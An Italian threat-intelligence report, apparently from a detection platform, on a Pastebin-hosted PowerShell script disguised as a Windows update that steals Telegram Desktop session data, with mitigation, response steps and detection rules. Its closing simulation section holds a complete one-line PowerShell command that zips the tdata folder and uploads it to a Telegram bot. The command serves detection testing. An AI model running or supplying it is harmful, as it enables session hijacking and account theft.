Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Uno script PowerShell malevolo ospitato su Pastebin si spaccia per un aggiornamento di Windows mentre ruba dati di sessione di Telegram Desktop dai sistemi infetti. Lo script raccoglie i dettagli dell’host, comprime il tdata directory di Telegram ed esfiltra l’archivio risultante tramite l’API del Bot di Telegram. I ricercatori hanno anche identificato un ladro basato sul web progettato per catturare le chiavi di autenticazione di Telegram Web e inoltrarle a un collettore HTTP locale. Entrambi gli strumenti si basano sullo stesso bot di Telegram per le notifiche, anche se le prove disponibili suggeriscono che rimangono in fase di test piuttosto che in uso operativo ampio.
Indagine
Gli analisti hanno recuperato due varianti di script ospitate su Pastebin, scoperto token di bot codificati e chat ID, e ricostruito l’intero processo di esfiltrazione. Durante l’esecuzione, lo script termina Telegram.exe, archivia la tdata cartella e carica il file ZIP tramite il metodo API sendDocument del bot. La telemetria del bot ha anche esposto un ladro separato focalizzato sul web che ha trasmesso chiavi di autenticazione MTProto a un collettore privato ospitato su 192.168.137.131:5000. Complessivamente, i risultati indicano test funzionali e convalida piuttosto che una campagna matura e su larga scala.
Mitigazione
Le organizzazioni che non richiedono Telegram dovrebbero bloccare il traffico in uscita verso api.telegram.org e infrastrutture correlate di Telegram. I difensori dovrebbero monitorare PowerShell per l’uso di Invoke-RestMethod or WebClient mirati agli endpoint dell’API di Telegram e rilevare archivi ZIP creati in directory temporanee che contengono tdata contenuti. Qualsiasi token di bot esposto deve essere immediatamente revocato e sostituito per prevenire ulteriori abusi.
Risposta
Se lo script viene scoperto, terminare il processo PowerShell associato e rimuovere eventuali diag.zip archivi generati. Revocare tutte le sessioni attive di Telegram collegate all’account compromesso e abilitare l’autenticazione a due fattori per ridurre il rischio di accesso continuato. Il token del bot dovrebbe essere cambiato e la chat del bot collegata dovrebbe essere controllata per evidenziare dati esfiltrati. Un’indagine forense più ampia dovrebbe anche confermare se sono stati raccolti ulteriori credenziali o materiali di sessione.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 %% Action nodes action_user_exec["<b>Azione</b> – <b>T1204 Esecuzione Utente</b><br/>La vittima esegue uno script PowerShell chiamato Windows Telemetry Update<br/><b>Tecnica</b> T1036 Mascheramento"] class action_user_exec action action_powershell_interp["<b>Azione</b> – <b>T1059.001 PowerShell</b><br/>Script eseguito tramite interprete PowerShell"] class action_powershell_interp action action_sysinfo["<b>Azione</b> – <b>T1082 Scoperta Informazioni di Sistema</b><br/>Raccoglie USERNAME, COMPUTERNAME e IP pubblico"] class action_sysinfo action action_collect_tdata["<b>Azione</b> – <b>T1005 Dati dal Sistema Locale</b><br/>Localizza le directory tdata di Telegram Desktop e termina Telegram.exe"] class action_collect_tdata action action_archive["<b>Azione</b> – <b>T1560.001 Archiviazione tramite Utilità</b><br/>Compressu2011Archive crea diag.zip con i file raccolti"] class action_archive action action_delete["<b>Azione</b> – <b>T1070.004 Eliminazione File</b><br/>Elimina diag.zip dopo l’upload"] class action_delete action action_exfiltration["<b>Azione</b> – <b>T1020 Esfiltrazione Automatizzata</b><br/>Utilizza l’endpoint sendDocument del Bot di Telegram per esfiltrare il file zip<br/><b>Sottu2011tecniche</b> T1041 Esfiltrazione su Canale C2, T1567 Esfiltrazione su Servizio Web, T1071.001 Protocolli Web"] class action_exfiltration action action_session_hijack["<b>Azione</b> – <b>T1563 Hijacking Sessione Servizio Remoto</b><br/>Riproduce chiavi di autorizzazione MTProto da tdata raccolti"] class action_session_hijack action action_steal_cookies["<b>Azione</b> – <b>T1550.004 Utilizzo di Materiale di Autenticazione Alternativo</b><br/>Ruba cookie di sessione di Telegram Web dallo storage del browser e li inoltra a un collezionista"] class action_steal_cookies action %% Tool / Process nodes tool_powershell["<b>Strumento</b> – <b>Nome</b>: PowerShell<br/><b>Descrizione</b>: Shell a riga di comando di Windows e linguaggio di scripting"] class tool_powershell tool tool_compress["<b>Strumento</b> – <b>Nome</b>: Compressu2011Archive<br/><b>Descrizione</b>: Cmdlet di PowerShell per creare archivi ZIP"] class tool_compress tool process_telegram["<b>Processo</b> – <b>Nome</b>: Telegram.exe<br/><b>Descrizione</b>: Client desktop per la messaggistica di Telegram"] class process_telegram process tool_telegram_bot["<b>Strumento</b> – <b>Nome</b>: API del Bot di Telegram<br/><b>Descrizione</b>: Endpoint sendDocument utilizzato per l’esfiltrazione di dati"] class tool_telegram_bot tool %% Connessioni che mostrano il flusso action_user_exec –>|innesca| action_powershell_interp action_powershell_interp –>|usa| tool_powershell action_powershell_interp –>|esegue| action_sysinfo action_sysinfo –>|raccoglie| action_collect_tdata action_collect_tdata –>|termina| process_telegram action_collect_tdata –>|usa| tool_compress action_collect_tdata –>|crea| action_archive action_archive –>|usa| tool_compress action_archive –>|produce| action_exfiltration action_exfiltration –>|usa| tool_telegram_bot action_exfiltration –>|cancella| action_delete action_delete –>|pulisce| action_exfiltration action_exfiltration –>|abilita| action_session_hijack action_session_hijack –>|facilita| action_steal_cookies "
Flusso di Attacco
Rivelazioni
Chiamata a Metodi .NET Sospetti da Powershell (tramite powershell)
Visualizza
Possibile Abuso di Telegram come Canale di Comando e Controllo (via dns_query)
Visualizza
Tentativi di Comunicazioni di Consultazione IP Possibile (via dns)
Visualizza
IOC (SourceIP) da rilevare: All’interno di un ladro di sessioni Telegram: Come uno script PowerShell ospitato su Pastebin colpisce sessioni desktop e web
Visualizza
IOC (DestinationIP) da rilevare: All’interno di un ladro di sessioni Telegram: Come uno script PowerShell ospitato su Pastebin colpisce sessioni desktop e web
Visualizza
Rilevamento di un ladro di sessioni Telegram tramite script PowerShell [Connessione di rete di Windows]
Visualizza
Aggiornamento Telemetria Windows – Ladro di Sessioni Telegram [Windows Powershell]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il controllo preliminare di Telemetria e Baseline deve essere superato.
Razionale: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per innescare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e puntano a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrazione e Comandi dell’Attacco:
- Ricognizione: L’attaccante interroga
api.ipify.orgper scoprire l’IP pubblico dell’host (utilizzato in seguito per il logging). - Interruzione del Servizio: Ferma il processo legittimo di Telegram Desktop per garantire che i file non siano bloccati.
- Raccolta Dati: Copia ricorsivamente la directory
tdatadi Telegram Desktop (file di sessione) in una posizione temporanea. - Archiviazione: Comprimi i dati raccolti in
diag.zip. - Esfiltrazione: Invia l’archivio a un Bot Telegram malevolo tramite
Invoke‑RestMethod. - Pulizia: Elimina l’archivio temporaneo e, eventualmente, riavvia Telegram.
- Ricognizione: L’attaccante interroga
-
Script di Test di Regressione: Esegue l’intera catena di attacco in un singolo comando PowerShell (adatto alla regola di rilevamento).
# Aggiornamento Telemetria Windows – Ladro di Sessioni Telegram $ip = (Invoke-RestMethod -Uri "http://api.ipify.org").Content; Stop-Process -Name Telegram -Force; $src = "$env:APPDATATelegram Desktoptdata"; $dst = "$env:TEMPdiag"; Copy-Item -Path $src -Destination $dst -Recurse -Force; Compress-Archive -Path $dst* -DestinationPath "$env:TEMPdiag.zip" -Force; $botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"; $chatId = "987654321"; Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendDocument?chat_id=$chatId" -Method Post -InFile "$env:TEMPdiag.zip" -ContentType "multipart/form-data"; Remove-Item -Path "$env:TEMPdiag.zip" -Force; -
Comandi di Pulizia: Ripristina l’ambiente allo stato originale.
# Riavvia Telegram (se desiderato) e rimuove i dati copiati Start-Process -FilePath "$env:ProgramFilesTelegram DesktopTelegram.exe" -WindowStyle Hidden; Remove-Item -Path "$env:TEMPdiag" -Recurse -Force;